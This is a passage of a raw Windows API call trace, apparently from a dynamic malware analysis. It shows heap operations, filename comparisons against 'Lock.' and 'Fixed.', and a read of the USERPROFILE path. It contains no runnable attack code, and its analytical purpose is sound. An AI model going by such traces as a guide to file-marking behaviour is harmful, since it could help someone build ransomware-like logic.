0x0 [0209.422] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0209.422] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0209.422] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.422] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.422] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cwsPQYJwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wsPQYJwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPQYJwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PQYJwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYJwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wproUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="proUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="roUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oUEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UEWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EWJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.423] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2a69c10 [0209.424] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cwsPQYJwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wsPQYJwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPQYJwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PQYJwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYJwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JwproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wproUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="proUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="roUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oUEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UEWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EWJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61b0 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.425] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0209.425] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71868 [0209.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0209.426] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.426] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71898 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0209.428] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.428] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a717c8 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a718f8 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.430] 